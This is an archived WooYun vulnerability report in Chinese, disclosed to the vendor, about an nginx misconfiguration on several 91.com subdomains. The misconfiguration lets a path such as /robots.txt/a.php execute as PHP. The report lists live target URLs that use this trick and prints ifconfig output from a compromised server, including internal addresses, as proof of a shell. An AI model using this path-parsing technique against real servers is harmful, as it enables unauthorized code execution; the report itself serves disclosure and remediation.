当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-040610

漏洞标题:91多台服务器中间件配置不当导致任意代码执行

相关厂商:福建网龙

漏洞作者: 猪猪侠

提交时间:2013-10-22 11:16

修复时间:2013-12-06 11:16

公开时间:2013-12-06 11:16

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-22: 细节已通知厂商并且等待厂商处理中
2013-10-22: 厂商已经确认,细节仅向厂商公开
2013-11-01: 细节向核心白帽子及相关领域专家公开
2013-11-11: 细节向普通白帽子公开
2013-11-21: 细节向实习白帽子公开
2013-12-06: 细节向公众公开

简要描述:

多个分站中间件配置不当导致的代码执行问题。

详细说明:

# nginx 中间件配置不当,导致任意代码执行
http://edu.91.com/bbs/robots.txt/a.php
http://bbs.91up.com/robots.txt/a.php
http://bbs.conquista.91.com/clientscript/vbulletin_important.css/a.php
http://mjoy.91.com/imgs/css/css.css/a.php

edu_91.jpg

漏洞证明:

# 简介上传利用,影响一堆网站

[/]$ /sbin/ifconfig -a
eth0 Link encap:Ethernet HWaddr 00:1D:09:23:13:5B
inet addr:121.207.250.14 Bcast:121.207.250.127 Mask:255.255.255.128
inet6 addr: fe80::21d:9ff:fe23:135b/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:363103431 errors:0 dropped:0 overruns:0 frame:0
TX packets:492912116 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:66258007376 (61.7 GiB) TX bytes:511694374092 (476.5 GiB)
Interrupt:169 Memory:f8000000-f8012800
eth1 Link encap:Ethernet HWaddr 00:1D:09:23:13:5D
inet addr:10.1.250.14 Bcast:10.1.250.255 Mask:255.255.255.0
inet6 addr: fe80::21d:9ff:fe23:135d/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2454819316 errors:0 dropped:0 overruns:0 frame:0
TX packets:2110907065 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2528618437861 (2.2 TiB) TX bytes:1547633675352 (1.4 TiB)
Interrupt:169 Memory:f4000000-f4012800
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:1252336 errors:0 dropped:0 overruns:0 frame:0
TX packets:1252336 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:135494036 (129.2 MiB) TX bytes:135494036 (129.2 MiB)
sit0 Link encap:IPv6-in-IPv4
NOARP MTU:1480 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)


oa.91.com_shell.jpg

修复方案:

# 升级NGINX至最新版,或修改配置。

版权声明:转载请注明来源 猪猪侠@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-10-22 15:55

厂商回复:

感谢 猪猪侠 提交的漏洞,已安排处理

最新状态:

暂无